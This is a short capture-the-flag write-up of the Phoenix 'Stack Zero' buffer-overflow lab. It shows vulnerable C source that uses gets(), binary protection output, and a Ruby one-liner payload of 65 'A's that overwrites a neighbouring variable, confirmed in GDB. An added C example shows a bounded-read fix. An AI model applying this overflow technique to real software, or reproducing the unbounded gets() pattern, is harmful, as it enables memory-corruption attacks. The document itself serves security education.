
(Write-up) Phoenix :: Stack Zero

Aibhstin · 2 min read

The source code for the Stack Zero challenge is given as the following:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  locals.changeme = 0;
  gets(locals.buffer);

  if (locals.changeme != 0) {
    puts("Well done, the 'changeme' variable has been changed!");
  } else {
    puts(
        "Uh oh, 'changeme' has not yet been changed. Would you like to try "
        "again?");
  }

  exit(0);
}

Looking at the source code, we can see that a struct is created in which a 64-byte buffer is declared immediately before a volatile int, changeme. The buffer is filled with gets, which is notorious for performing no bounds checking on its input, so a line longer than the buffer runs past its end and into changeme.
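To make the layout and the fix concrete, here is an added C example (not the challenge's code and not from the write-up's author). It reproduces the struct as a hypothetical struct locals, shows with offsetof that changeme sits 64 bytes after the start of buffer, computes how far a gets() call would write past the buffer for a given line length, and replaces gets with a bounded reader (read_line_bounded, an assumed name) that rejects overlong lines instead of overflowing. fmemopen stands in for stdin so the constructed input can be run offline.

```c
#define _POSIX_C_SOURCE 200809L /* for fmemopen(3) */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Same layout as the challenge's locals struct: 64 bytes of buffer followed
 * by the int the overflow reaches. (Added example, not the challenge's code.) */
struct locals {
    char buffer[64];
    volatile int changeme;
};

/* Distance from the start of buffer to changeme: 64 on this layout, so the
 * 65th byte written through buffer lands in changeme. */
size_t changeme_offset(void) {
    return offsetof(struct locals, changeme);
}

/* Bytes gets() would write beyond buffer for a line of line_len characters.
 * gets() stores the line plus a NUL terminator; 0 means the line fits. */
size_t gets_overflow_bytes(size_t line_len) {
    size_t written = line_len + 1;
    size_t cap = sizeof(((struct locals *)0)->buffer);
    return written > cap ? written - cap : 0;
}

/* Bounded replacement for gets(locals.buffer). Reads at most
 * sizeof buffer - 1 characters, strips the newline, and returns
 *    0  line read completely
 *   -1  no input at all
 *   -2  line longer than the buffer (the rest is drained and discarded) */
int read_line_bounded(struct locals *l, FILE *in) {
    if (fgets(l->buffer, sizeof l->buffer, in) == NULL) {
        l->buffer[0] = '\0';
        return -1;
    }
    size_t n = strlen(l->buffer);
    if (n > 0 && l->buffer[n - 1] == '\n') {
        l->buffer[n - 1] = '\0';
        return 0;
    }
    /* No newline in the buffer: the line either ended exactly at capacity
     * (next char is '\n' or EOF) or was cut short. */
    int c = getc(in);
    if (c == EOF || c == '\n') return 0;
    while (c != EOF && c != '\n') c = getc(in);
    return -2;
}

/* Outcome of running the challenge's check with the bounded reader. */
struct outcome {
    int status;   /* return value of read_line_bounded */
    int changeme; /* value of locals.changeme afterwards */
};

struct outcome run_bounded(const char *input) {
    struct locals locals;
    struct outcome out = { -1, 0 };
    locals.changeme = 0;
    /* fmemopen lets the constructed input stand in for stdin. */
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL) return out;
    out.status = read_line_bounded(&locals, in);
    out.changeme = locals.changeme;
    fclose(in);
    return out;
}

/* Constructed input: count 'A' characters followed by a newline, the same
 * shape as the write-up's ruby -e 'puts "A" * 65' payload. */
struct outcome run_bounded_as(size_t count) {
    char line[256];
    if (count > sizeof line - 2) count = sizeof line - 2;
    memset(line, 'A', count);
    line[count] = '\n';
    line[count + 1] = '\0';
    return run_bounded(line);
}

int main(void) {
    printf("changeme is %zu bytes past buffer\n", changeme_offset());
    printf("65 A's through gets() would overflow by %zu bytes\n",
           gets_overflow_bytes(65));
    struct outcome o = run_bounded_as(65);
    printf("bounded read: status %d, changeme %d\n", o.status, o.changeme);
    return 0;
}
```

A 65-character line through gets() writes 66 bytes (65 plus the NUL) into a 64-byte buffer, which is why the write-up's payload changes changeme; the bounded reader reports -2 for the same input and leaves changeme at 0.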

user@phoenix-amd64:/opt/phoenix/amd64$ rabin2 -I stack-zero 
havecode true
pic      false
canary   false
nx       false
crypto   false
va       true
intrp    /opt/phoenix/x86_64-linux-musl/lib/ld-musl-x86_64.so.1
bintype  elf
class    ELF64
lang     c
arch     x86
bits     64
machine  AMD x86-64 architecture
os       linux
minopsz  1
maxopsz  16
pcalign  0
subsys   linux
endian   little
stripped false
static   false
linenum  true
lsyms    true
relocs   true
rpath    /opt/phoenix/x86_64-linux-musl/lib
binsz    4351

Even though it's fairly obvious where the vulnerability is in the binary, let's run it:

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-zero 
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Hello
Uh oh, 'changeme' has not yet been changed. Would you like to try again?

I'm going to use Ruby to create a file we can pipe into the program to exploit the overflow.

user@phoenix-amd64:/opt/phoenix/amd64$ ruby -e 'puts "A" * 65' > /tmp/stack-zero-out
user@phoenix-amd64:/opt/phoenix/amd64$ cat /tmp/stack-zero-out 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

And the exploit in action:

user@phoenix-amd64:/opt/phoenix/amd64$ cat /tmp/stack-zero-out | ./stack-zero 
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed!

In GDB, we can look at the state of the stack just after the call to gets:

(gdb) x/20xw $rsp
0x7fffffffe5e0: 0xffffe698      0x00007fff      0x00000000      0x00000001
0x7fffffffe5f0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe600: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe610: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe620: 0x41414141      0x41414141      0x41414141      0x41414141

Posted on Jun 17 by Aibhstin (@aibhstin)

I'm an Ethical Hacking & Cybersecurity student and a Haskell programmer.
